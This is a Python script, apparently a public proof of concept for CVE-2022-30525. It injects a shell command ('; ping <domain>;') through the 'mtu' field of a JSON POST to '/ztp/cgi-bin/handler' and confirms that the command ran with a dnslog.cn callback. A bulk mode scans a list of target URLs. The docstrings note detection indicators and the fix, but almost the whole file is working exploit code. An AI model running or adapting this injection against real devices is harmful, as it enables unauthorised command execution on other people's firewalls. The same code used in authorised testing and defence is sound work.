CVE-2022-30525.py
#!/usr/bin/python3
import random, sys, urllib3, json, time, requests
from optparse import OptionParser
# Silences urllib3's warnings process-wide. This hides the
# InsecureRequestWarning that would otherwise be emitted for the probe
# request below, which is sent with verify=False (no TLS certificate check).
urllib3.disable_warnings()
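class detection(object):
    """Out-of-band check for CVE-2022-30525 against one URL or a URL list.

    The check is active, not a passive fingerprint: it POSTs a
    ``setWanPortSt`` request to ``<url>/ztp/cgi-bin/handler`` whose ``mtu``
    field carries ``; ping <domain>;`` for a freshly issued dnslog.cn
    subdomain, then asks dnslog.cn whether that name was looked up. A hit
    means the ``ping`` command actually ran on the device.

    Points a reviewer or operator should keep in mind:

    * dnslog.cn is a third-party service reached over plain HTTP; the
      callback domain and every lookup made against it are visible to that
      service and to anyone on the path.
    * The probe POST is sent with ``verify=False``, so the TLS certificate
      of the target is not checked.
    * No callback is inconclusive rather than proof of a fixed device:
      outbound DNS may be filtered, the host may be unreachable, or the
      dnslog.cn session may have failed.
    * Defensive view: the probe is visible in web/proxy logs as a POST to
      ``/ztp/cgi-bin/handler`` with a non-numeric ``mtu`` value, and in DNS
      logs as a query for a ``dnslog.cn`` name originating from the device.
      Remediation is the vendor's fixed firmware.
    """

    def __init__(self, option):
        """Store the parsed options and open one HTTP session for dnslog.cn.

        Args:
            option: object exposing ``url`` and ``ip_file`` attributes
                (the optparse values object in this script).
        """
        self.option = option
        # Read from the argument, not the module-level ``options`` global,
        # so the class also works when it is imported or built directly.
        self.url = option.url
        self.file = option.ip_file
        # A single session keeps the dnslog.cn cookie, which ties the issued
        # domain to the later records lookup.
        self.res = requests.session()

    @staticmethod
    def _normalize_url(line):
        """Return *line* stripped and with a scheme, or None when it is blank."""
        url = line.strip()
        if not url:
            return None
        if not url.startswith("http"):
            url = "http://" + url
        return url

    def dnslogFetch(self):
        """Request a callback domain from dnslog.cn.

        Returns:
            The response body (the issued domain) on success, otherwise
            None after printing a short message.
        """
        target = random.random()  # query-string cache-buster, not a secret
        url = f"http://www.dnslog.cn/getdomain.php?t={target}"
        try:
            res1 = self.res.get(url=url, timeout=10)
        except requests.RequestException as exc:
            print(f"Unable to discover DNSLog: {exc}")
            return None
        if res1.status_code == 200 and "dnslog" in res1.text:
            return res1.text
        print("Unable to discover DNSLog")
        return None

    def identification(self):
        """Probe ``self.url`` once and print the outcome.

        Prints the callback domain, the raw dnslog.cn records, and a verdict
        line. Returns None in every case.
        """
        target_url = self.url + "/ztp/cgi-bin/handler"
        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36",
            "Content-Type": "application/json"
        }
        extractedlog = self.dnslogFetch()
        if not extractedlog:
            # Without a callback domain the payload would contain "None" and
            # the membership test below would raise TypeError; no verdict is
            # possible, so stop here.
            print(f"{self.url}: skipped, no DNSLog domain available")
            return
        print(extractedlog)
        data = {
            "command": "setWanPortSt",
            "proto": "dhcp",
            "port": "4",
            "vlan_tagged": "1",
            "vlanid": "5",
            "mtu": f"; ping {extractedlog};",
            "data": "hi"
        }
        try:
            requests.post(url=target_url, headers=headers, data=json.dumps(data), timeout=5, verify=False)
        except requests.RequestException as exc:
            # The original ignored every error here, presumably because the
            # request can time out while the injected command is still
            # running. Keep going, but report it so an unreachable host is
            # not silently read as a clean result.
            print(f"{self.url}: request error ({type(exc).__name__}); checking DNSLog anyway")
        # Give the device time to resolve the name before polling.
        time.sleep(5)
        url_record = f"http://www.dnslog.cn/getrecords.php?t={random.random()}"
        try:
            # Fetch once so the printed records are the ones that are tested.
            records = self.res.get(url=url_record, timeout=10).text
        except requests.RequestException as exc:
            print(f"{self.url}: could not read DNSLog records: {exc}")
            return
        print(records)
        if extractedlog in records:
            print(f"{self.url} is vulnerable to CVE-2022-30525")
        else:
            # Absence of a callback does not establish that the device is
            # patched (filtered DNS, unreachable host, dnslog.cn failure).
            print(f"{self.url}: no DNSLog callback observed (inconclusive for CVE-2022-30525)")

    def BulkScan(self):
        """Run ``identification`` for every non-blank line of ``self.file``.

        Lines without an ``http`` prefix get ``http://`` prepended. Targets
        are processed one after another.
        """
        # Read-only: the list is never written, so "r+" only added a needless
        # write-permission requirement.
        with open(self.file, "r") as urls:
            for line in urls:
                url = self._normalize_url(line)
                if url is None:
                    continue
                self.url = url
                self.identification()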
def banner():
    """Write the tool's one-line banner to standard output."""
    title = "CVE-2022-30525 exploit for Single and Multiple Targets"
    print(title)
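if __name__ == "__main__":
    # Entry point: print the banner, parse the command line, then run either
    # the single-URL check or the file-driven check. With neither option the
    # usage text is printed and the process exits with status 1.
    banner()
    parser = OptionParser()
    # optparse accepts only single-character short options ("-x"). The
    # original "-iL" made add_option raise OptionError before any argument
    # was parsed, so the short form is "-l"; "--bulk" is unchanged.
    parser.add_option("-l", "--bulk", dest="ip_file", help="File containing list of URLs")
    parser.add_option("-u", "--single", dest="url", type="string", help="Target URL Address")
    # ``options`` stays a module-level name because other code in this file
    # may read it.
    (options, args) = parser.parse_args()
    if options.url:
        detection(options).identification()
    elif options.ip_file:
        detection(options).BulkScan()
    else:
        parser.print_help()
        sys.exit(1)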